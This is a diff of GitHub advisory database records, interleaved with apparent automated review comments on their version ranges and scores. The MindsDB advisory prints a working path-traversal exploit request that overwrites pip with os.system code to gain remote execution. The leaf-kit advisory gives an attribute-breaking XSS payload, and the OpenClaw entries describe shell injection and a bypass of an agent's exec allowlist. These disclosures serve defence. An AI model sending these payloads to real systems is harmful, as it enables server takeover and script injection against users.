"https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-42p5-62qq-mmh7" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25987" + }, + { + "type": "WEB", + "url": "https://github.com/ImageMagick/ImageMagick/commit/bbae0215e1b76830509fd20e6d37c0dd7e3e4c3a" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ImageMagick/ImageMagick" + }, + { + "type": "WEB", + "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-24T15:44:47Z", + "nvd_published_at": "2026-02-24T02:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json b/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json index a7d9702027908..c42b11fa1c57f 100644 
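Review bot: The `summary` and `details` describe a defect in ImageMagick's MAP decoder, but the `affected` array holds only the nineteen Magick.NET NuGet packages fixed in `14.10.3`, and neither field states which ImageMagick release carries the upstream fix; a sentence in `details` such as `Fixed upstream in ImageMagick commit bbae0215e1b76830509fd20e6d37c0dd7e3e4c3a` (already in `references`) would let consumers building against ImageMagick directly act on this without an ecosystem match. The `details` text says "crashes or unintended memory disclosure" while the vector scores `C:L` and `A:N`; if the over-read is known to disclose heap bytes, `details` should say so explicitly, and if the observed outcome was only the ASan crash shown, the disclosure claim should be hedged to match the score.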
--- a/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json +++ b/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-43fc-jf86-j433", - "modified": "2026-02-09T22:39:32Z", + "modified": "2026-02-18T17:15:11Z", "published": "2026-02-09T17:46:14Z", "aliases": [ "CVE-2026-25639" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.0.0" }, { "fixed": "1.13.5" @@ -36,6 +36,28 @@ "database_specific": { "last_known_affected_version_range": "<= 1.13.4" } + }, + { + "package": { + "ecosystem": "npm", + "name": "axios" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.30.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.30.2" + } } ], "references": [ @@ -51,14 +73,26 @@ "type": "WEB", "url": "https://github.com/axios/axios/pull/7369" }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/pull/7388" + }, { "type": "WEB", "url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57" }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e" + }, { "type": "PACKAGE", "url": "https://github.com/axios/axios" }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/releases/tag/v0.30.0" + }, { "type": "WEB", "url": "https://github.com/axios/axios/releases/tag/v1.13.5" diff --git a/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json new file mode 100644 index 0000000000000..3bd8b7d8813d7 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json 
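Review bot: The new 0.x `affected` entry in the `@@ -36,6 +36,28 @@` hunk sets `fixed` to `0.30.3` and `last_known_affected_version_range` to `<= 0.30.2`, but the release reference added in the last hunk points at `releases/tag/v0.30.0` rather than the fixed release; if the backport shipped in 0.30.3 the link should be `https://github.com/axios/axios/releases/tag/v0.30.3`, otherwise the fixed version itself needs correcting. Narrowing the 1.x range to `introduced 1.0.0` is consistent with adding the 0.x entry, but the new entry keeps `introduced 0`; if the vulnerable code was added in a specific 0.x release, naming it avoids flagging every earlier version. The added `pull/7388` and `commit/d7ff1409…` references are not tied to either range by any visible text, so a reader cannot tell which one is the 0.x backport.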
@@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4564-pvr2-qq4h", + "modified": "2026-02-23T22:28:27Z", + "published": "2026-02-18T17:39:00Z", + "aliases": [ + "CVE-2026-27487" + ], + "summary": "OpenClaw: Prevent shell injection in macOS keychain credential write", + "details": "## Summary\nOn macOS, the Claude CLI keychain credential refresh path constructed a shell command to write the updated JSON blob into Keychain via `security add-generic-password -w ...`. Because OAuth tokens are user-controlled data, this created an OS command injection risk.\n\nThe fix avoids invoking a shell by using `execFileSync(\"security\", argv)` and passing the updated keychain payload as a literal argument.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Platform: macOS only\n- Affected versions: `<= 2026.2.13`\n\n## Fix\n- Patched version: `>= 2026.2.14` (next release)\n- Fix PR: #15924\n- Fix commits (merged to `main`):\n - `9dce3d8bf83f13c067bc3c32291643d2f1f10a06`\n - `66d7178f2d6f9d60abad35797f97f3e61389b70c`\n - `b908388245764fb3586859f44d1dff5372b19caf`\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4564-pvr2-qq4h" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27487" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/pull/15924" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/66d7178f2d6f9d60abad35797f97f3e61389b70c" + }, + { + "type": "WEB", + "url": 
"https://github.com/openclaw/openclaw/commit/9dce3d8bf83f13c067bc3c32291643d2f1f10a06" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/b908388245764fb3586859f44d1dff5372b19caf" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:39:00Z", + "nvd_published_at": "2026-02-21T10:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4685-c5cp-vp95/GHSA-4685-c5cp-vp95.json b/advisories/github-reviewed/2026/02/GHSA-4685-c5cp-vp95/GHSA-4685-c5cp-vp95.json new file mode 100644 index 0000000000000..2a8327c2369ec --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4685-c5cp-vp95/GHSA-4685-c5cp-vp95.json 
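Review bot: The `details` text still reads `Patched version: >= 2026.2.14 (next release)` while the `references` array in the same hunk already links `releases/tag/v2026.2.14`, so the parenthetical is stale and should be dropped. The `affected` entry has no `database_specific.last_known_affected_version_range`, unlike the sibling `openclaw` advisory GHSA-4685-c5cp-vp95 in this commit which records one; adding `"last_known_affected_version_range": "<= 2026.2.13"` matches the `Affected versions: <= 2026.2.13` line in `details` and keeps the two files consistent. `details` also states the issue is macOS-only, but nothing in the `affected` entry can express that, so consumers on other platforms will still be flagged; saying so in `details` would save them a triage step.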
@@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4685-c5cp-vp95", + "modified": "2026-02-19T22:06:00Z", + "published": "2026-02-19T22:06:00Z", + "aliases": [], + "summary": "OpenClaw safeBins stdin-only bypass via sort output and recursive grep flags", + "details": "## Summary\n`tools.exec.safeBins` could be bypassed for filesystem access when `sort` output flags (`-o` / `--output`) or recursive `grep` flags were allowed through safe-bin execution paths.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.2.17`\n- Patched versions: `>= 2026.2.19`\n- Latest published version at triage time: `2026.2.17`\n\n## Impact\nIn deployments that enabled `tools.exec.safeBins`, an attacker with access to command execution flows could turn intended stdin-only safe-bin usage into file writes (`sort -o`) or recursive file reads (`grep -R`).\n\n## Fix Commit(s)\n- `cfe8457a0f4aae5324daec261d3b0aad1461a4bc`\n\nThanks @nedlir for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2026.2.17" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4685-c5cp-vp95" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/cfe8457a0f4aae5324daec261d3b0aad1461a4bc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-184", + "CWE-78" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T22:06:00Z", + "nvd_published_at": null + } +} \ No newline at end of file 
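Review bot: The range in this hunk goes from `last_known_affected_version_range: <= 2026.2.17` straight to `fixed: 2026.2.19`, so a `2026.2.18` release, if one was published, is implicitly marked vulnerable without being mentioned anywhere; `details` should state whether 2026.2.18 exists and is affected, or the last-known range should be raised to `<= 2026.2.18`. The `details` line `Latest published version at triage time: 2026.2.17` is time-bound and will read as contradicting the fixed version once newer releases exist; prefix it with the triage date or remove it. `aliases` is `[]`; if a CVE is assigned later the entry should be updated rather than left empty.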
diff --git a/advisories/github-reviewed/2026/02/GHSA-47qc-857f-7w7f/GHSA-47qc-857f-7w7f.json b/advisories/github-reviewed/2026/02/GHSA-47qc-857f-7w7f/GHSA-47qc-857f-7w7f.json new file mode 100644 index 0000000000000..c657392d110ca --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-47qc-857f-7w7f/GHSA-47qc-857f-7w7f.json 
@@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-47qc-857f-7w7f", + "modified": "2026-02-19T20:25:46Z", + "published": "2026-02-19T20:25:46Z", + "aliases": [], + "summary": "PyO3 has type confusion when accessing data from sublasses of subclasses of native types with `abi3` feature", + "details": "PyO3 0.28.1 added support for `#[pyclass(extends=PyList)] struct NativeSub` (and other native types) when targeting Python 3.12 and up with the `abi3` feature.\n\nIt was discovered that subclasses of such classes would use the type of the subclass when attempting to access to data of `NativeSub` contained within Python objects, amounting to memory corruption.\n\nPyO3 0.28.2 fixed the issue by using the type of (e.g.) `NativeSub` correctly.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "pyo3" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.28.0" + }, + { + "fixed": "0.28.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/PyO3/pyo3/pull/5807#issuecomment-3913251784" + }, + { + "type": "WEB", + "url": "https://github.com/PyO3/pyo3/commit/75abd8602896b350fd8c778e52e0a74b4644ccca" + }, + { + "type": "PACKAGE", + "url": "https://github.com/PyO3/pyo3" + }, + { + "type": "WEB", + "url": "https://github.com/PyO3/pyo3/releases/tag/v0.28.2" + }, + { + "type": "WEB", + "url": "https://rustsec.org/advisories/RUSTSEC-2026-0013.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-843" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T20:25:46Z", + "nvd_published_at": null + } +} \ No newline at end of file 
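Review bot: The `affected` range in this hunk sets `introduced` to `0.28.0`, but the `details` text says the `#[pyclass(extends=...)]` support under `abi3` was added in PyO3 0.28.1; if that is accurate the vulnerable code does not exist in 0.28.0 and `introduced` should be `0.28.1`, otherwise the `details` wording needs correcting so the two agree. The `summary` contains the typo `sublasses`, which should read `subclasses`. `aliases` is empty while `references` link `RUSTSEC-2026-0013`; recording the RUSTSEC id as an alias would let consumers querying by RustSec id find this entry.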
diff --git a/advisories/github-reviewed/2026/02/GHSA-4894-xqv6-vrfq/GHSA-4894-xqv6-vrfq.json b/advisories/github-reviewed/2026/02/GHSA-4894-xqv6-vrfq/GHSA-4894-xqv6-vrfq.json new file mode 100644 index 0000000000000..9d6019bf9db07 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4894-xqv6-vrfq/GHSA-4894-xqv6-vrfq.json 
@@ -0,0 +1,69 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4894-xqv6-vrfq",
+ "modified": "2026-02-24T20:07:59Z",
+ "published": "2026-02-24T20:07:58Z",
+ "aliases": [
+ "CVE-2026-27483"
+ ],
+ "summary": "MindsDB: Path Traversal in /api/files Leading to Remote Code Execution",
+ "details": "### Summary\n\nThere is a path traversal vulnerability in Mindsdb's /api/files interface, which an authenticated attacker can exploit to achieve remote command execution.\n\n### Details\n\nThe vulnerability exists in the \"Upload File\" module, which corresponds to the API endpoint /api/files. The affected code is located at mindsdb/api/http/namespaces/file.py:\n```python\n@ns_conf.route(\"/\")\n@ns_conf.param(\"name\", \"MindsDB's name for file\")\nclass File(Resource):\n @ns_conf.doc(\"put_file\")\n @api_endpoint_metrics('PUT', '/files/file')\n def put(self, name: str):\n \"\"\"add new file\n params in FormData:\n - file\n - original_file_name [optional]\n \"\"\"\n\n data = {}\n mindsdb_file_name = name\n\n existing_file_names = ca.file_controller.get_files_names()\n\n def on_field(field):\n name = field.field_name.decode()\n value = field.value.decode()\n data[name] = value\n\n file_object = None\n\n def on_file(file):\n nonlocal file_object\n data[\"file\"] = file.file_name.decode()\n file_object = file.file_object\n\n temp_dir_path = tempfile.mkdtemp(prefix=\"mindsdb_file_\")\n\n if request.headers[\"Content-Type\"].startswith(\"multipart/form-data\"):\n parser = multipart.create_form_parser(\n headers=request.headers,\n on_field=on_field,\n on_file=on_file,\n config={\n \"UPLOAD_DIR\": temp_dir_path.encode(), # bytes required\n \"UPLOAD_KEEP_FILENAME\": True,\n \"UPLOAD_KEEP_EXTENSIONS\": True,\n \"MAX_MEMORY_FILE_SIZE\": 0,\n },\n )\n\n while True:\n chunk = request.stream.read(8192)\n if not chunk:\n break\n parser.write(chunk)\n parser.finalize()\n parser.close()\n\n if file_object is not None:\n if not file_object.closed:\n try:\n file_object.flush()\n except 
(AttributeError, ValueError, OSError):\n logger.debug(\"Failed to flush file_object before closing.\", exc_info=True)\n file_object.close()\n file_object = None\n else:\n data = request.json\n```\nSince the multipart file upload does not perform security checks on the uploaded file path, an attacker can perform path traversal by using ../ sequences in the filename field. The file write operation occurs before calling clear_filename and save_file, meaning there is no filtering of filenames or file types, allowing arbitrary content to be written to any path on the server.\n\n\n### PoC\n\nThis vulnerability can be exploited to overwrite existing executable files, which retain their executable permissions after being overwritten. In addition to conventional file upload exploitation methods, we provide a way to achieve Remote Code Execution (RCE) by leveraging MindsDB's own functionality.\n\nThe API endpoint //install is used to install handlers, which internally calls install_dependencies to install dependencies via pip. This function executes pip using subprocess.Popen. Therefore, an attacker can:\n\n1. Exploit the vulnerability to overwrite /venv/lib/python3.10/site-packages/pip/__init__.py with a malicious Python script.\n2. 
Trigger the execution of the malicious script by calling //install, which invokes pip.\n \nExploit:\n```\nPUT /api/files/mm HTTP/1.1\nHost: ip:47334\nContent-Length: 579\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36\nAccept: application/json, text/plain, */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryv9dZC0cAHLlHSHD9\nOrigin: http://ip:47334\nReferer: http://ip:47334/fileUpload\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh,en;q=0.9,zh-CN;q=0.8\nCookie: bid=87948125-5042-4fc8-a692-9cbf71e387be\nConnection: keep-alive\n\n------WebKitFormBoundaryv9dZC0cAHLlHSHD9\nContent-Disposition: form-data; name=\"name\"\n\nmm\n------WebKitFormBoundaryv9dZC0cAHLlHSHD9\nContent-Disposition: form-data; name=\"source\"\n\nmm\n------WebKitFormBoundaryv9dZC0cAHLlHSHD9\nContent-Disposition: form-data; name=\"source_type\"\n\nfile\n------WebKitFormBoundaryv9dZC0cAHLlHSHD9\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py\"\nContent-Type: text/plain\n\nimport os\nos.system(\"touch /tmp/rce_by_hacker\")\n------WebKitFormBoundaryv9dZC0cAHLlHSHD9--\n```\nAfter sending this request, you can observe the logs in Docker's output:\n```\n2025-05-30 02:26:52,432 http INFO python_multipart.multipart: Opening a file on disk\n2025-05-30 02:26:52,433 http INFO python_multipart.multipart: Saving with filename in: b'/root/mdb_storage/tmp/mindsdb_byom_file_89h0zcz0'\n2025-05-30 02:26:52,433 http INFO python_multipart.multipart: Opening file: b'/root/mdb_storage/tmp/mindsdb_byom_file_89h0zcz0/../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py'\n```\nAt this point, you can see that the file has been successfully overwritten:\n```\nroot@e445c93b2fd5:/mindsdb# cat /venv/lib/python3.10/site-packages/pip/__init__.py\nimport os\nos.system(\"touch /tmp/rce_by_hacker\")\n```\nAfterwards, install any 
handler in the UI, and you will see that the file rce_by_hacker is successfully created in the /tmp directory. The same result can also be achieved by sending an API request to trigger it.\n\n### Credit\n\nThis vulnerability was discovered by:\n- XlabAI Team of Tencent Xuanwu Lab\n- Atuin Automated Vulnerability Discovery Engine\n\nIf there are any questions regarding the vulnerability details, please feel free to reach out to MindsDB for further discussion at xlabai@tencent.com.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "mindsdb"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "25.9.1.1"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27483"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/mindsdb/mindsdb/commit/87a44bdb2b97f963e18f10a068e1a1e2690505ef"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/mindsdb/mindsdb"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/mindsdb/mindsdb/releases/tag/v25.9.1.1"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-24T20:07:58Z",
+ "nvd_published_at": "2026-02-24T15:21:38Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json b/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json
new file mode 100644
index 0000000000000..3e50474af8813
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json
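Review bot: The details twice name the handler-installation endpoint as `//install`, which reads as if an angle-bracketed placeholder for the handler name was dropped when the report was sanitized into this record, leaving readers unable to locate the second stage; the upstream text should use a form that survives rendering, such as `/{handler}/install` (constructed placeholder). The Docker log excerpt shows a temp-directory prefix `mindsdb_byom_file_` while the quoted `put()` calls `tempfile.mkdtemp(prefix="mindsdb_file_")`, which suggests the PoC and the code snippet were taken from different revisions, so the snippet should cite the revision it came from. The `introduced 0` / `fixed 25.9.1.1` range and CWE-22 are consistent with the narrative.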
@@ -0,0 +1,69 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-49pc-8936-wvfp",
+ "modified": "2026-02-23T22:30:18Z",
+ "published": "2026-02-20T21:14:49Z",
+ "aliases": [
+ "CVE-2026-27492"
+ ],
+ "summary": "Lettermint Node.js SDK leaks email properties to unintended recipients when client instance is reused",
+ "details": "### Impact\nEmail properties (such as to, subject, html, text, and attachments) are not reset between sends when a single client instance is reused across multiple .send() calls. This can cause properties from a previous send to leak into a subsequent one, potentially delivering content or recipient addresses to unintended parties. Applications sending emails to different recipients in sequence — such as transactional flows like password resets or notifications — are affected.\n\n### Patches\nYes, the issue has been patched. Users should upgrade to v1.5.1 or later.\n\n### Workarounds\nIf upgrading immediately is not possible, instantiate a new client for each send:\n```js\nconst client = new Lettermint({ apiKey: process.env.LETTERMINT_API_KEY });\nawait client.email.to('...').subject('...').html('...').send();\n```\n\nThis ensures no state is carried over between sends.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "lettermint"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.5.1"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/lettermint/lettermint-node/security/advisories/GHSA-49pc-8936-wvfp"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27492"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/lettermint/lettermint-node/commit/24a17acbc2429c5eb30391f9df3dc0ea7aaf4de1"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/lettermint/lettermint-node"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/lettermint/lettermint-node/blob/main/CHANGELOG.md#151-2026-02-20"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-488"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-20T21:14:49Z",
+ "nvd_published_at": "2026-02-21T11:15:57Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json b/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json
index 9ce39d9038fa0..b1103d27602d6 100644
--- a/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json
+++ b/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-4chv-4c6w-w254",
- "modified": "2026-02-17T21:29:05Z",
+ "modified": "2026-02-19T21:56:47Z",
 "published": "2026-02-17T21:29:05Z",
 "aliases": [
 "CVE-2026-26267"
@@ -87,6 +87,10 @@
 "type": "WEB",
 "url": "https://github.com/stellar/rs-soroban-sdk/security/advisories/GHSA-4chv-4c6w-w254"
 },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26267"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/stellar/rs-soroban-sdk/pull/1729"
@@ -115,6 +119,6 @@
 "severity": "HIGH",
 "github_reviewed": true,
 "github_reviewed_at": "2026-02-17T21:29:05Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-19T20:25:43Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json b/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json
new file mode 100644
index 0000000000000..a079fd9c57ac1
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json
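Review bot: The CVSS vector `AV:L/AC:H/PR:L` in the GHSA-49pc-8936-wvfp hunk models the attacker as a local low-privileged user, yet the impact described is a remote recipient receiving another recipient's email body or address when a server reuses one client across `.send()` calls, so the vector appears to understate exposure and is worth reconfirming against the narrative. The Patches section (`v1.5.1 or later`) and the range's `"fixed": "1.5.1"` agree, and CWE-488 fits the stale-state-across-sends cause. The Workarounds snippet only constructs a fresh `Lettermint` per send; stating explicitly that the leaked fields are `to`, `subject`, `html`, `text` and `attachments` in the Impact section already makes the workaround's scope clear, so no further change is needed there.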
@@ -0,0 +1,67 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4hfh-fch3-5q7p",
+ "modified": "2026-02-23T22:21:47Z",
+ "published": "2026-02-19T19:40:08Z",
+ "aliases": [
+ "CVE-2026-27120"
+ ],
+ "summary": "Leaf-kit html escaping does not work on characters that are part of extended grapheme cluster",
+ "details": "### Summary\n\n`htmlEscaped` in leaf-kit will only escape html special characters if the extended grapheme clusters match, which allows bypassing escaping by using an extended grapheme cluster containing both the special html character and some additional characters. In the case of html attributes, this can lead to XSS if there is a leaf variable in the attribute that is user controlled.\n\n### Details\n\nRelevant code:\nhttps://github.com/vapor/leaf-kit/blob/main/Sources/LeafKit/String%2BHTMLEscape.swift#L14\n\nStrings in Swift are based on extended grapheme clusters. HTML on the other hand is based on unicode characters. \n\nFor example if you have the sequence \"́ (U+0022 Quotation mark followed by U+0301 Combining Acute Accent). To HTML this is just a quote mark followed by some other random character. To swift this is one extended grapheme cluster that does not equal a quotation mark by itself which is a different extended grapheme cluster.\n\nThus `\"\\\"́\".replacingOccurrences(of: \"\\\"\", with: \""\")` does not replace the quote mark. This allows you to break out of html attributes.\n\nI believe replacingOccurences takes an optional third parameter that allows you to specify options to make it work on UTF-8 characters instead of grapheme clusters, which would be a good fix for this issue.\n\nI see depending on version, leafkit might use `replacing` instead of `replacingOccurences`. I don't know swift that well and couldn't find docs on what replacing does, so I don't know if both versions of the function are affected. 
The version of swift i was testing on I believe was using replacingOccurences\n\nIt seems like replacingOccurences will skip past prefix characters of extended grapheme clusters, which is what would be needed in order to meaningfully bypass esaping of <. Thus i think this is mostly limited to attributes and not general text.\n\n### PoC\n\nAn example vapor application that is vulnerable might look like\n\nroutes.swift\n```swift\nimport Vapor\n\nstruct Hello: Content {\n var msg: String?\n}\n\nfunc routes(_ app: Application) throws {\n app.post { req throws in\n\tlet Hello = try req.content.decode(Hello.self)\n return req.view.render(\"hello\", [\n \"msg\": Hello.msg ?? \"Hello World!\"\n ])\n }\n}\n```\n\nWith a hello.leaf that looks like\n```\n
Hover to see message
\n```\n\nAnd then you POST something like `msg=%22%cc%81=1%20autofocus%20tabindex=0%20onfocus=alert(1)%20`\n\n### Impact\nIf a website uses leaf to escape an attribute value based on user input, the attacker may be able to insert a malicious attribute. If a site is not using a secure CSP policy, then this can be used to execute malicious javascript (XSS). Impact is context dependent if a site is using a secure CSP policy.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "SwiftURL",
+ "name": "leaf-kit"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.4.1"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/vapor/leaf-kit/security/advisories/GHSA-4hfh-fch3-5q7p"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27120"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/vapor/leaf-kit/commit/8919e39476c3a4ba05c28b71546bb9195f87ef34"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/vapor/leaf-kit"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-75",
+ "CWE-79",
+ "CWE-87"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-19T19:40:08Z",
+ "nvd_published_at": "2026-02-20T22:16:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json b/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json
index 3de18c6a5137c..0b9184be45e10 100644
--- a/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json
+++ b/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json
